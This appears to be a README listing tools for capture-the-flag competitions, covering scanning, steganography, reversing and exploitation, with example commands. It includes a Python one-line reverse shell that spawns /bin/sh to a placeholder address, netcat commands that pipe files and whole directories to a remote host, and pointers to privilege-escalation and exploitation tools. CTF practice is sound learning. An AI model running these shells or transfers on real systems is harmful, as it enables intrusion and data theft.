Collection of useful tools for CTFs.
- Web
- Crypto
- Steganography
- Binary/Reverse
- Other
- Useful
- [to update]
- nmap
Example usage : sudo nmap -sS -A -T4 <ip_target> -oN <name_output> -vv
- gobuster
Example usage for directory/file enum :
gobuster dir -u <ip_target> --wordlist <path_to_wordlist> -x <extensions>
where: * path_to_wordlist can be something like "/usr/share/wordlists/<wordlist>"
* extensions like php, txt, js, cgi, sh, ...
- dirb
- curl
- nikto
Example usage: nikto -h <ip_target>
- wpscan
- wget
Example usage: wget <url>
- golismero
Example usage:
golismero scan -i /root/port80.xml -o sub1-port80.html
- Burpsuite
- steghide
Example usage: steghide <command> <file>
where command can be: > info
> extract
> embed
- Stegosolve
- exif
- exiftool
- binwalk
- aperisolve.fr
- checksec
- strings
- ltrace
- strace
- frida
- gdb / gdb-peda
- hexdump (-C option very useful)
- objdump
- apktool
- Jadx -- Java decompiler
- Decompile Jar,pyc,exe,class,...
- Pwntools
- nc -- TCP/IP swiss army knife
- linpeas.sh -- for Linux Privesc
- sudo -l -- to get which files I can run with sudo
- searchsploit -- search through Exploit db archive
Example usage: searchsploit OpenSSH 7.2p2
searchsploit -p 46635 -- it returns the URL of the CVE in exploit db
- msfconsole -- the god tool for exploitation
- sending a file using nc:
server side : nc <ip_server> <port_server> < <file>
client side : nc -lvp <port> > <file>
- sending directory using nc:
server side : nc -lvp <port> | tar xf -
client side : tar cf - . | nc <ip_server> <port_server>
- sending a file using nc + wget:
server side : wget <ip_server>:<port_server>/<file>
client side : nc -lvp <port> < <file>
!! [NOTE: protocol will continue after transmission of file (maybe because client side does not receive CRLF sequence). So after a while, just press CTRL+c et voit-là]
- to convert a python script from v.2 to v.3
python3 -m lib2to3 <script>.py -w
- connect to server pop3 (port 110) using telnet:
telnet <ip> 110
- reverse shell with one line only, using python3:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- run a simple python3 server:
python -m http.server
- create a generic ssl/tls client which establishes a connection to a remote server speaking ssl/tls.
Example: openssl s_client -connect <ip_address>:<port>
If all it is ok, paste the password and it’s done.
- append data to a file:
Example usage: printf "<data>" |cat - <file> > <file_out>
where data is something like "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00"
- PEM Parser
- view and edit files in hexadecimal or in ASCII
hexedit [filename]
- Francesco Varotto - @frarotto
- Massimiliano Belluomini - @massibelluomini
- Filippo Giambartolomei - @filippogiamba